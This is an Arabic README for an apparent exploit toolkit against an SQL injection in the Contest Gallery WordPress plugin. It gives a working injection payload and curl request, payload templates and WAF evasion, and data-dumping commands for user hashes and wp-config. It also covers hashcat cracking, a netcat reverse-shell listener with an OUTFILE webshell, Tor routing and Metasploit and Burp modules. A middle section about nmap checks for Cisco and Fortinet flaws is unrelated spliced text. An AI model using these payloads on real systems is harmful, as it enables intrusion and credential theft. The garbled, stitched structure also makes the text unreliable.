
مجموعة أدوات استغلال كاملة لـ CVE-2026-3180 - ثغرة حقن SQL في إضافة معرض المسابقات لووردبريس. تشمل استخراج بيانات آلي، تجاوز WAF، شيل عكسي، تكامل مع SQLMap، إنشاء إضافة Burp، وإعداد تقارير لاختبار الاختراق والأبحاث الأمنية.
أداة تقييم إثبات المفهوم لـ CVE-2026-3180
المؤلف: Sudeepa Wanigarathna · الاكتشاف الأصلي: cardosource
[!IMPORTANT] للاستخدام المصرح به فقط. هذه الأداة مخصصة للبحث الأمني والتعليم واختبار الأنظمة التي تملكها أو لديك إذن كتابي صريح لتقييمها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام.
CVE-2026-3180 هي ثغرة حقن SQL أعمى عالية الخطورة وغير مصادقة في إضافة Contest Gallery لووردبريس. توجد العيب في معالج AJAX post_cg1l_resend_unconfirmed_mail_frontend، حيث يتم تمرير المعامل cgl_mail إلى استعلام SQL دون تنظيف مناسب.
يوفر هذا المستودع أداة إثبات مفهوم Python كاملة الميزات (الإصدار 2.0) للمتخصصين الأمنيين المصرح لهم للتحقق من التأثير، واستخراج بيانات ووردبريس، وإنشاء التقارير، والتكامل مع الأدوات المعيارية في المجال (SQLMap وBurp Suite وNuclei).
| الحقل | القيمة |
|---|
POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.example Content-Type: application/x-www-form-urlencoded
action=post_cg1l_resend_unconfirmed_mail_frontend &cgl_mail=qualquer'OR/**/1=1#@teste.com &cgl_page_id=1 &cgl_activation_key= &cg_nonce=%20
### المراجع
- [CVE-2026-3180](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3180)
- [Exploit-DB 52609](https://www.exploit-db.com/exploits/52609)
- [الشرح الأصلي (cardosource)](https://dev.to/22l31on/wordpress-contest-gallery-plugin-vulnerability-2ff6)
---
## الميزات
### الاستغلال الأساسي
| الإمكانية | الوصف |
|---|---|
| كشف الثغرات | اختبارات الاستعلام المنطقي، والزمني، والمعتمد على الأخطاء، والاتحاد، والمكدسة |
| الاستخراج الأعمى | استخراج الأحرف بالبحث الثنائي عبر الاستدلال المنطقي |
| تفريغ البيانات الكامل | المستخدمون، بيانات تعريف قاعدة البيانات، الخيارات، الإضافات، السمات، المقالات، الجداول |
| واجهة SQL تفاعلية | تشغيل استعلامات `SELECT` مخصصة ضد الخلفية |
| استخراج wp-config.php | محاولات `LOAD_FILE()` ضد المسارات الشائعة |
| شل عكسي | كتابة PHP webshell عبر `INTO OUTFILE` / `DUMPFILE` (عند السماح) |
### التهرب والأداء
| الإمكانية | الوصف |
|---|---|
| تجاوز جدار الحماية | أكثر من 15 تقنية ترميز وإخفاء |
| تعدد الخيوط | خيوط عمل قابلة للتكوين لاستخراج أسرع |
| تحديد المعدل | تأخير قابل للتكوين بين الطلبات |
| منطق إعادة المحاولة | إعادة محاولة تلقائية عند فشل عابر |
| تدوير وكيل المستخدم | بصمات متصفح عشوائية لكل طلب |
| دعم الوكيل | وكلاء HTTP/SOCKS وTor (`socks5h://127.0.0.1:9050`) |
### التقارير والتكاملات
| الإمكانية | الوصف |
|---|---|
| توليد التقارير | تقارير JSON وHTML مع ملخصات الاستخراج |
| تكامل SQLMap | أمر SQLMap مولّد تلقائياً مع أدوات التمويه |
| ملحق Burp Suite | مولد + `burp_contest_gallery.py` مستقل |
| قالب Nuclei | قالب YAML للكشف الجماعي |
| وحدة Metasploit | وحدة مساعدة Ruby (`contest_gallery_sqli.rb`) |
| أتمتة الشل | نصوص Bash لسير عمل curl وSQLMap |
### التشغيلي
| الإمكانية | الوصف |
|---|---|
| مخرجات CLI ملونة | تسجيل منظم بمستويات خطورة |
| تتبع التقدم | مقاييس فورية (الطلبات، التوقيت، سرعة الاستخراج) |
| أوضاع هادئة / مطولة | مناسبة للبرمجة النصية والتصحيح |
| معالجة الإشارات | تنظيف أنيق عند `Ctrl+C` |
| جاهز لـ Docker | دعم النشر المعبأ بالحاويات |
| جاهز لخط أنابيب CI/CD | رموز الخروج ومخرجات JSON للأتمتة |
---
## التثبيت
### المتطلبات الأساسية
- Python **3.8+**
- `pip`
- إمكانية الوصول الشبكي إلى الهدف (الأهداف) قيد الاختبار
### الأدوات الخارجية الاختيارية
| الأداة | الغرض |
|---|---|
| [SQLMap](https://github.com/sqlmapproject/sqlmap) | حقن SQL الآلي |
| [Burp Suite](https://portswigger.net/burp) | الاختبار اليدوي واستضافة الإضافات |
| [Nuclei](https://github.com/projectdiscovery/nuclei) | المسح القائم على القوالب |
| [Hashcat](https://hashcat.net/hashcat/) | كسر التجزئات دون اتصال |
| [Tor](https://www.torproject.org/) | التوجيه المجهول (`--proxy tor`) |
### الإعداد```bash
git clone https://github.com/CerberusMrXi/WP-Contest-Gallery-28.1.4-Exploit.git
cd WP-Contest-Gallery-28.1.4-Exploit
python3 -m venv venv
source venv/bin/activate # Windows: venv\Scripts\activate
pip install -r requirements.txt
python3 cve-2026-3180.py --help
مطلوبة (وقت التشغيل):```text requests>=2.31.0
**موصى به (من requirements.txt):**```text
colorama>=0.4.6
tqdm>=4.65.0
pyyaml>=6.0
python-dateutil>=2.8.2
urllib3>=2.0.0
يستخدم الاستغلال الرئيسي فقط مكتبة Python القياسية بالإضافة إلى
requests. تعمل الحزم الإضافية على تحسين المخرجات والتقارير.
استبدل
http://target.exampleبهدف مختبري أو مصرح به فقط.
python3 cve-2026-3180.py http://target.example --scan
### الاستغلال الكامل (الكشف + الاستخراج)```bash
python3 cve-2026-3180.py http://target.example
python3 cve-2026-3180.py http://target.example --dump users
### واجهة SQL التفاعلية```bash
python3 cve-2026-3180.py http://target.example --sql-shell
python3 cve-2026-3180.py http://target.example --report html -o assessment.html
### عبر Burp proxy```bash
python3 cve-2026-3180.py http://target.example --proxy http://127.0.0.1:8080 -v
python3 cve-2026-3180.py http://target.example --scan
يقوم بتشغيل الكشف المنطقي، الزمني، والقائم على الأخطاء دون استخراج كامل.
### استخراج كامل للبيانات```bash
python3 cve-2026-3180.py http://target.example --dump all
يستخرج معلومات قاعدة البيانات، المستخدمين، الخيارات، الإضافات، الثيمات، المقالات، الجداول، وبيانات النظام الوصفية.
python3 cve-2026-3180.py http://target.example --dump database python3 cve-2026-3180.py http://target.example --dump users python3 cve-2026-3180.py http://target.example --dump config python3 cve-2026-3180.py http://target.example --dump options python3 cve-2026-3180.py http://target.example --dump plugins python3 cve-2026-3180.py http://target.example --dump themes
### شل SQL التفاعلي```bash
python3 cve-2026-3180.py http://target.example --sql-shell
⚠️ يجب تشغيل سكريبت list-args.nse فقط على الأجهزة التي تعذر عليك الوصول إلى حقلي الاسم أو العلامة التجارية.
يُنتج هذا السكريبت ضوضاء على شكل طلبات إلى كائنات oid مختلفة وبالتالي قد يتم حظره.
ابحث عن أجهزة Cisco IOS-XE التي تعرض خدمات HTTP/HTTPS.
تحقق من وجود الثغرة CVE-2023-20198 باستخدام ./cve-2023-20198-ios-xe-check.nse <host>.
ماسح أكثر شمولاً لهذه الثغرة هو Cisco IOS-XE CVE-2023-20198 check by fox-it من فريق Fox-IT التابع لمجموعة NCC.
ثغرة تجاوز المصادقة باستخدام مسار أو قناة بديلة [CVE-2022-40684] في FortiOS وFortiProxy وFortiSwitchManager قد تسمح لمهاجم غير مصرح له بتنفيذ عمليات على واجهة الإدارة عبر طلبات HTTP أو HTTPS مصممة خصيصاً.
يمكنك فحص الأجهزة المحتمل تأثرها باستخدام الأمر:
nmap -sV --script http-fortinet-cve-2022-40684.nse -p 80,443,4443,8443 <target>
ثغرة تجاوز سعة المخزن المؤقت المستند إلى الكومة [CVE-2023-27997] في SSL-VPN الخاصة بـ FortiOS وFortiProxy قد تسمح لمهاجم عن بعد بتنفيذ تعليمات برمجية أو أوامر عشوائية عبر طلبات مصممة خصيصاً.
يمكنك فحص الأجهزة المحتمل تأثرها باستخدام الأمر:
nmap -sV -p [443,10443] --script ./fortinet-cve-2023-27997.nse <target>
ثغرة تجاوز سعة المخزن المؤقت المستند إلى المكدس [CVE-2023-33308] في FortiOS وFortiProxy قد تسمح لمهاجم عن بعد بتنفيذ تعليمات برمجية أو أوامر عشوائية عبر حزم مصممة تصل إلى سياسات الوكيل أو سياسات الجدار الناري مع وضع الوكيل إلى جانب فحص الحزم العميق SSL.
يمكنك فحص الأجهزة المحتمل تأثرها باستخدام الأمر:
nmap -sV -p [443,10443] --script ./fortinet-cve-2023-33308.nse <target>
ثغرة كتابة خارج الحدود [CVE-2024-21762] في FortiOS قد تسمح لمهاجم غير مصرح له عن بعد بتنفيذ تعليمات برمجية أو أوامر عشوائية عبر طلبات HTTP مصممة خصيصاً. يُحتمل استغلال هذه الثغرة بشكل فعّال.
تحذير: سكريبت NSE هذا يطابق الإصدار فقط ولا يمكنه استغلال الثغرة. احصل على مزيد من التفاصيل حول الأصول من الهدف وتحقق من النتائج يدوياً.
يمكنك فحص الأجهزة المحتمل تأثرها باستخدام الأمر:
nmap -sV --script ./fortinet-cve-2024-21762.nse -p 443,10443 <target>
ثغرة استخدام سلسلة تنسيق خاضعة للتحكم الخارجي [CVE-2024-23113] في الخدمة fgfmd من FortiOS قد تسمح لمهاجم غير مصرح له عن بعد بتنفيذ تعليمات برمجية أو أوامر عشوائية عبر طلبات مصممة خصيصاً.
تحذير: سكريبت NSE هذا يطابق الإصدار فقط ولا يمكنه استغلال الثغرة. احصل على مزيد من التفاصيل حول الأصول من الهدف وتحقق من النتائج يدوياً.
يمكنك فحص الأجهزة المحتمل تأثرها باستخدام الأمر:
`nmap -sV --script ./fortinet-cve-2024-23113.nse -p 541 ````text
sql> SELECT DATABASE()
wordpress
sql> show users [ { "username": "admin", "email": "[email protected]", "password_hash": "$P$B..." } ]
sql> show tables ["wp_users", "wp_posts", "wp_options", ...]
sql> exit
**أوامر الصدفة:**
| الأمر | الوصف |
|---|---|
| `SELECT ...` | تنفيذ استعلام SQL وطباعة النتيجة |
| `show users` | عرض المستخدمين المستخرجين المخبأين |
| `show tables` | عرض قائمة الجداول المخبأة |
| `show database` | عرض بيانات قاعدة البيانات المخبأة |
| `show config` | عرض wp-config.php إذا تم استخراجه |
| `show options` | عرض خيارات ووردبريس |
| `show plugins` | عرض الإضافات النشطة |
| `help` | سرد الأوامر المتاحة |
| `exit` / `quit` | الخروج من الصدفة |
### توليد التقرير```bash
# JSON report (default, saved to reports/)
python3 cve-2026-3180.py http://target.example --report json
# HTML report with custom filename
python3 cve-2026-3180.py http://target.example --report html -o reports/assessment.html
nc -lvnp 4444
python3 cve-2026-3180.py http://target.example --reverse-shell 10.0.0.5 4444
> يتطلب امتياز `FILE`، جذر ويب قابل للكتابة، وعدم حظر `secure_file_priv` للمسار الهدف.
### توليد أوامر SQLMap```bash
python3 cve-2026-3180.py http://target.example --sqlmap
أو استخدم النص البرمجي الآلي المُرفق:```bash chmod +x sqlmap_automation.sh ./sqlmap_automation.sh http://target.example
### إضافة Burp Suite```bash
# Generate extension from exploit
python3 cve-2026-3180.py http://target.example --burp-extension
# Or load the standalone extension
# Burp → Extender → Extensions → Add → Python → burp_contest_gallery.py
python3 cve-2026-3180.py http://target.example --nuclei-template
nuclei -u http://target.example -t CVE-2026-3180.yaml
### أتمتة Bash (بدون Python)```bash
chmod +x cve-2026-3180_automated.sh
./cve-2026-3180_automated.sh http://target.example
python3 cve-2026-3180.py http://target.example --proxy tor
### ضبط الأداء```bash
python3 cve-2026-3180.py http://target.example \
--threads 20 \
--timeout 15 \
--delay 0.1 \
--retries 5 \
-v
| الوسيطة | الوصف |
|---|---|
target | عنوان URL الأساسي لووردبريس الهدف (مثل http://target.example) |
| الوسيطة | الوصف |
|---|---|
--verbose, -v | تمكين تسجيل التصحيح |
--quiet | إخفاء إخراج وحدة التحكم |
--output, -o |
تقوم الأداة تلقائيًا باختبار واستخدام استراتيجيات حقن متعددة:
يقوم PayloadManager بتدوير أكثر من 12 قالب حقن:```text
'OR//{condition}#@teste.com
'OR{condition}-- -
')OR{condition}#
'))OR{condition}#
'OR//{condition}OR//'1'='1'#
'UNION//SELECT{condition}#
...
### خوارزمية الاستخراج البولياني
1. تأكيد الثغرة باستخدام أطوال الأساس true/false
2. بحث ثنائي لـ `LENGTH()` نتيجة الاستعلام المستهدف
3. بحث ثنائي لـ `ASCII(SUBSTRING(...))` لكل موضع حرف
4. تجميع السلسلة الكاملة من الأحرف المستخرجة
---
## تجاوز WAF
تقنيات تشويش مدمجة تُطبق عشوائياً أو عند الطلب:
| التقنية | الوصف |
|---|---|
| `comment_obfuscation` | استبدال المسافات بـ `/**/`, `/*!*/`, `-- `, `#` |
| `case_variation` | أحرف كبيرة/صغيرة عشوائية في الأحرف الأبجدية |
| `url_encoding` | ترميز النسبة المئوية القياسي |
| `double_url_encoding` | ترميز النسبة المئوية المتداخل |
| `hex_encoding` | ترميز سداسي عشري على نمط `%41` |
| `unicode_encoding` | ترميز يونيكود على نمط `%u0041` |
| `white_space_variation` | علامات تبويب، أسطر جديدة، تغذية نموذج بدلاً من المسافات |
| `keyword_obfuscation` | تقسيم الكلمات المفتاحية: `SEL/**/ECT`, `UNI/**/ION` |
| `concat_obfuscation` | سلسلة `CHAR()` عبر `\|\|` |
| `char_obfuscation` | إضافة `CHAR()` عبر `+` |
مثال على حمولة محولة:```text
qualquer'OR/**/1=1#@teste.com
→ qualquer'%2F**%2FOR%2F**%2F1%3D1%23%40teste.com
{ "username": "admin", "password_hash": "$P$Bxxxxxxxxxxxxxxxxxxxxxxxxxxxxx", "email": "[email protected]", "roles": ["administrator"] }
### تكسير تجزئة كلمات المرور (غير متصل)
بعد الاستخراج، قم بتكسير تجزئات WordPress phpass باستخدام Hashcat:```bash
# Save hashes to file
python3 cve-2026-3180.py http://target.example --dump users -o users.json
# Crack with Hashcat (mode 400 = phpass)
hashcat -m 400 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
الأمر المُولَّد (عبر --sqlmap):```bash
sqlmap -u "http://target.example/wp-admin/admin-ajax.php"
--data "action=post_cg1l_resend_unconfirmed_mail_frontend&cgl_mail=test'&cgl_page_id=1&cgl_activation_key=&cg_nonce=%20"
-p cgl_mail
--dbms=mysql
--level=3 --risk=2
--batch
--threads=5
--time-sec=5
--retries=3
--delay=0.05
--random-agent
--hex
--tamper=space2comment,randomcase,between,charencode
--dbs
### Burp Suite
1. قم بتحميل `burp_contest_gallery.py` في **Extender → Extensions → Add**
2. افتح علامة التبويب **CVE-2026-3180**
3. أدخل عنوان URL المستهدف وانقر على **Exploit**
4. يقوم الماسح الضوئي السلبي بفحص طلبات AJAX للبحث عن مؤشرات Contest Gallery
### Nuclei```yaml
id: CVE-2026-3180
info:
name: WordPress Contest Gallery SQL Injection
severity: high
classification:
cve-id: CVE-2026-3180
cvss-score: 7.5
requests:
- method: POST
path: /wp-admin/admin-ajax.php
body: "action=post_cg1l_resend_unconfirmed_mail_frontend&cgl_mail=test'&cgl_page_id=1&cgl_activation_key=&cg_nonce=%20"
cp contest_gallery_sqli.rb ~/.msf4/modules/auxiliary/scanner/http/
msfconsole -q -x "use auxiliary/scanner/http/contest_gallery_sqli; set RHOSTS target.example; run"
## سلسلة الهجوم```mermaid
flowchart TD
A["Unauthenticated POST to admin-ajax.php"] --> B["cgl_mail parameter unsanitized"]
B --> C{"Injection type?"}
C -->|Boolean| D["Response length inference"]
C -->|Time| E["SLEEP delay inference"]
C -->|Error| F["SQL error leakage"]
D --> G["Binary-search extraction"]
E --> G
F --> G
G --> H["WordPress data exfiltration"]
H --> I["Users / hashes / options / config"]
I --> J["Optional: OUTFILE webshell"]
post_cg1l_resend_unconfirmed_mail_frontend في إضافة Contest Gallery.cgl_mail المدمجة في SQL دون معلمات.[] Target: http://target.example [] Checking vulnerability... [+] Target is VULNERABLE! (Boolean-based) [+] Response length difference: 42 chars [*] Extracting database information... [+] name: wordpress [+] version: 8.0.35 [+] Found 3 users [+] Exploitation complete!
### هيكل تقرير JSON```json
{
"metadata": {
"cve": "CVE-2026-3180",
"cvss_score": "7.5 (High)",
"type": "boolean_based"
},
"target": {
"url": "http://target.example",
"ajax_url": "http://target.example/wp-admin/admin-ajax.php"
},
"vulnerability": {
"vulnerable": true,
"type": "boolean_based"
},
"extracted_data": {
"database": { "name": "wordpress", "version": "8.0.35" },
"users": [],
"tables": [],
"plugins": [],
"options": {}
},
"summary": {
"users_found": 3,
"tables_found": 12,
"plugins_found": 8,
"config_extracted": false
}
}
Reports are saved to reports/ by default.
FROM python:3.11-slim
WORKDIR /app COPY requirements.txt cve-2026-3180.py ./ RUN pip install --no-cache-dir -r requirements.txt
ENTRYPOINT ["python3", "cve-2026-3180.py"] CMD ["--help"]
| المعرف | المعرف المحلي | الحالة | الوصف |
|---------|----------|--------|-------------|
| CVE-2024–0001 | | | محجوز | 2024-01-01 |```bash
# Build
docker build -t cve-2026-3180 .
# Scan
docker run --rm cve-2026-3180 http://target.example --scan
# Full exploit with report volume
docker run --rm -v $(pwd)/reports:/app/reports cve-2026-3180 \
http://target.example --report json
مثال على سير عمل GitHub Actions للمسح الضوئي على البيئة التجريبية المصرح به:```yaml name: CVE-2026-3180 Staging Scan
on: workflow_dispatch: schedule: - cron: '0 2 * * 1'
jobs: scan: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4
- uses: actions/setup-python@v5
with:
python-version: '3.11'
- run: pip install -r requirements.txt
- name: Vulnerability scan
run: |
python3 cve-2026-3180.py ${{ secrets.STAGING_URL }} \
--scan --quiet
continue-on-error: true
- name: Generate report
run: |
python3 cve-2026-3180.py ${{ secrets.STAGING_URL }} \
--report json -o reports/staging.json
- uses: actions/upload-artifact@v4
with:
name: security-report
path: reports/
---
## استكشاف الأخطاء وإصلاحها
| العَرَض | ما يجب محاولته |
|---|---|
| الهدف غير معرّض للخطر | تأكد من تثبيت وتفعيل Contest Gallery الإصدار 28.1.4 أو أقل |
| عدم وجود اختلاف في طول الاستجابة | جرب `--scan` للرجوع إلى الاستعلامات الزمنية؛ قم بزيادة `--timeout` |
| استخراج بطيء جدًا | قم بزيادة `--threads`؛ قلل `--delay` بحذر |
| أخطاء الاتصال | ارفع قيم `--timeout` و `--retries`؛ تحقق من إعدادات الوكيل |
| حظر WAF للطلبات | استخدم `--proxy tor`؛ الأداة تطبق تقنيات تجاوز تلقائيًا |
| فشل وكيل Tor | تحقق من تشغيل Tor على `127.0.0.1:9050`؛ قم بتثبيت `requests[socks]` إذا لزم الأمر |
| تفريغ مستخدمين فارغ | قد لا تكون بادئة الجدول `wp_`؛ استخدم `--sql-shell` مع استعلامات مخصصة |
| لم يتم العثور على wp-config | جرب `--sql-shell` مع مسارات `LOAD_FILE()` بديلة |
| فشل الصدفة العكسية | تحقق من صلاحية `FILE`، و `secure_file_priv`، وأذونات مجلد الويب الجذر |
### سير عمل التصحيح```bash
# Verbose scan
python3 cve-2026-3180.py http://target.example --scan -v
# Through Burp
python3 cve-2026-3180.py http://target.example \
--proxy http://127.0.0.1:8080 -v --scan
# Manual curl verification
curl -s -X POST "http://target.example/wp-admin/admin-ajax.php" \
-d "action=post_cg1l_resend_unconfirmed_mail_frontend&cgl_mail=qualquer'OR/**/1=1#@teste.com&cgl_page_id=1&cgl_activation_key=&cg_nonce=%20" \
-w "\nSize: %{size_download}\n"
exploit/ ├── cve-2026-3180.py # Main exploit tool (v2.0) ├── requirements.txt # Python dependencies ├── README.md # This file ├── burp_contest_gallery.py # Standalone Burp Suite extension ├── contest_gallery_sqli.rb # Metasploit auxiliary module ├── cve-2026-3180_automated.sh # Bash/curl automation script ├── sqlmap_automation.sh # SQLMap wrapper script ├── reports/ # Generated reports (created at runtime) ├── backups/ # Database backups (created at runtime) ├── payloads/ # Custom payload storage └── venv/ # Local virtualenv (optional, not committed)
---
## سجل الإصدارات
### الإصدار 2.0.0 — النسخة النهائية (يناير 2026)
- كشف الحقن المنطقي (Boolean)، الزمني (Time)، الخطأ (Error)، الاتحادي (Union)، والمكدس (Stacked)
- خط أنابيب كامل لاستخراج بيانات ووردبريس
- أكثر من 15 تقنية لتجاوز جدار الحماية للتطبيقات (WAF)
- شل SQL تفاعلية
- إنشاء تقارير بصيغة JSON / HTML
- تكامل مع SQLMap وBurp وNuclei
- شل عكسي عبر `INTO OUTFILE`
- دعم البروكسي وTor
- تعدد المهام مع منطق إعادة المحاولة
- مخرجات ملونة وتسجيل منظم
### الإصدار 1.0 — الإصدار الأولي
- كشف أساسي يعتمد على الحقن المنطقي (Boolean)
- استخراج يدوي للمستخدمين
---
## إخلاء مسؤولية
هذا المشروع مُقدم **كما هو** لأغراض **أبحاث الأمن الدفاعي** و**اختبار الاختراق المصرح به**.
باستخدامك لهذا البرنامج، فإنك توافق على ما يلي:
1. ستستهدف فقط الأنظمة التي تملكها أو التي لديك إذن صريح باختبارها.
2. أنت تدرك القوانين المطبقة المتعلقة بإساءة استخدام الحاسوب وحماية البيانات.
3. المؤلف والمساهمون **ليسوا مسؤولين** عن أي ضرر أو فقدان بيانات أو عواقب قانونية ناتجة عن سوء الاستخدام.
إذا اكتشفت هذه الثغرة في بيئة إنتاجية، فاتبع ممارسات الإفصاح المسؤول وتنسق مع بائع الإضافة / فريق أمان ووردبريس حسب الاقتضاء.
---
## المؤلف والإسنادات
| الدور | الاسم |
|---|---|
| **مؤلف الأداة** | Sudeepa Wanigarathna |
| **الاكتشاف الأصلي** | cardosource |
| **CVE** | CVE-2026-3180 |
| **الترخيص** | MIT |
---
## الترخيص```
MIT License
Copyright (c) 2026 Sudeepa Wanigarathna
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
لاختبارات الأمان المصرح بها فقط.
| السمة | القيمة |
|---|
| CVE ID | CVE-2026-3180 |
| CVSS | 7.5 (High) |
| متجه الهجوم | شبكة — غير مصادق |
| التأثير | اختراق السرية، قراءة قاعدة البيانات، سرقة بيانات الاعتماد |
| المنتج المتأثر | إضافة Contest Gallery لووردبريس |
| الإصدارات المتأثرة | 28.1.4 والإصدارات الأقدم |
| نوع الثغرة | Blind SQL Injection |
| DBMS | MySQL / MariaDB |
| URL | /wp-admin/admin-ajax.php |
| الطريقة | POST |
| الإجراء | post_cg1l_resend_unconfirmed_mail_frontend |
| المعامل القابل للثغر | cgl_mail |
| الوسيطة | الافتراضي | الوصف |
|---|
--proxy | — | عنوان URL للبروكسي أو tor لـ SOCKS5 عبر Tor |
--timeout | 10 | مهلة طلب HTTP (بالثواني) |
--delay | 0.05 | تأخير بين الطلبات (بالثواني) |
--retries | 3 | عدد مرات إعادة المحاولة عند فشل الطلبات |
--threads, -t | 5 | حجم مجموعة الخيوط |
| مسار ملف إخراج مخصص |
| الوسيطة | الوصف |
|---|
| (افتراضي) | استغلال كامل: اكتشاف ← فحص ← استخراج الكل |
--scan | كشف الثغرات فقط |
--sql-shell | واجهة SQL تفاعلية |
--dump {users,config,database,options,plugins,themes,all} | استخراج بيانات محددة |
--report {json,html} | إنشاء تقرير تقييم |
--reverse-shell LHOST LPORT | محاولة شل عكسي عبر كتابة ملف |
--sqlmap | طباعة أمر SQLMap |
--burp-extension | إنشاء إضافة Burp Suite |
--nuclei-template | إنشاء قالب YAML لـ Nuclei |
| النوع | طريقة الكشف | حالة الاستخدام |
|---|
| قائم على القيم المنطقية | تفاضل طول الاستجابة (1=1 مقابل 1=2) | محرك الاستخراج الأساسي |
| قائم على الوقت | استنتاج تأخير SLEEP() | احتياطي عندما تكون إشارات القيم المنطقية ضعيفة |
| قائم على الأخطاء | EXTRACTVALUE() / سلاسل أخطاء SQL | بيانات وصفية سريعة عند تسرب الأخطاء |
| قائم على الاتحاد | حمولات UNION SELECT | استرجاع القيم المباشرة (عند الإمكان) |
| استعلامات متراصة | صيغة '; ... # | تنفيذ متعدد العبارات (نادر) |
| الهدف | مصدر SQL | مفتاح الإخراج |
|---|
| اسم قاعدة البيانات | SELECT DATABASE() | database.name |
| إصدار قاعدة البيانات | SELECT VERSION() | database.version |
| مستخدم قاعدة البيانات | SELECT USER() | database.user |
| الجداول | information_schema.TABLES | tables[] |
| الأعمدة | information_schema.COLUMNS | columns{} |
| مستخدمي ووردبريس | wp_users | users[] |
| تجزئات كلمات المرور | wp_users.user_pass | users[].password_hash |
| البريد الإلكتروني | wp_users.user_email | users[].email |
| الأدوار | wp_usermeta القدرات | users[].roles |
| خيارات الموقع | wp_options | options{} |
| الإضافات النشطة | wp_options.active_plugins | plugins[] |
| السمات | template / stylesheet الخيارات | themes[] |
| المنشورات | wp_posts | posts[] |
| wp-config.php | LOAD_FILE('/var/www/html/wp-config.php') | config |
| معلومات النظام | @@hostname, @@datadir, إلخ. | system_info{} |